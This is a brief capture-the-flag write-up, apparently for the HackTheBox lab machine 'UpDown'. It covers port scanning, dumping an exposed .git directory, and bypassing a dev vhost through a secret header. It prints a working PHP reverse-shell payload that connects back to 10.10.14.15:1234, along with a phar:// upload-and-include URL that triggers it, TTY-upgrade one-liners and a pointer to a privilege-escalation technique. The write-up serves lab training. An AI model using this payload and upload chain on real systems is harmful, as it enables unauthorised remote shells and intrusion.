UpDown - Writeup

1 minute read

UpDown

Reconnaissance

IP: 10.10.11.177

NMAP

nmap -T4 -p- -A 10.10.11.177

Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-02 06:14 UTC
Nmap scan report for 10.10.11.177
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
|   256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_  256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose|router
Running: Linux 5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT      ADDRESS
1   31.01 ms 10.10.14.1
2   31.09 ms 10.10.11.177

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.52 seconds

Website

Site

ffuf found /dev but there is nothing more, also find subdirectory http://siteisup.htb but cannot open it. Let’s dig deeper and scan again

ok we got .git.

Just dump it to easier enumeration

git-dumper http://siteisup.htb/dev/.git/ .

I found interesting commit with comment about new technique to protect dev vhost

ok, we from git logs we know that we need to add Special-Dev: only4dev header to connect to dev.siteusup.htb, let’s try it

add header with Modify Header Value https://addons.mozilla.org/en-US/firefox/addon/modify-header-value/

<?php 

$descriptorspec = [ 

    0 => ["pipe", "r"],  // STDIN 

    1 => ["pipe", "w"],  // STDOUT 

    2 => ["pipe", "w"],  // STDERR 

]; 

$command = "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.15/1234 0>&1'"; 

$process = proc_open($command, $descriptorspec, $pipes); 

if (is_resource($process)) { 

    fclose($pipes[0]); // Close STDIN 

    fclose($pipes[1]); // Close STDOUT 

    fclose($pipes[2]); // Close STDERR 

    proc_close($process); 

} 

?>

save as rev.php, then zip rev.abc upload and navigate to :

http://dev.siteisup.htb/?page=phar://uploads/22fa9abfe9c50075a95d916ad666e595/rev.abc/rev

we got reverse shell Upgrade to TTY

python3 -c 'import pty; pty.spawn("/bin/sh")'

__import__('os').system('/bin/bash')

https://gtfobins.github.io/gtfobins/easy_install/

Share on

X Facebook LinkedIn Bluesky

UpDown - Writeup

UpDown

Reconnaissance

NMAP

Website

Site

Share on

You May Also Enjoy

Usage - Writeup

UnderPass - Writeup

Titanic - Writeup

Timelapse - Writeup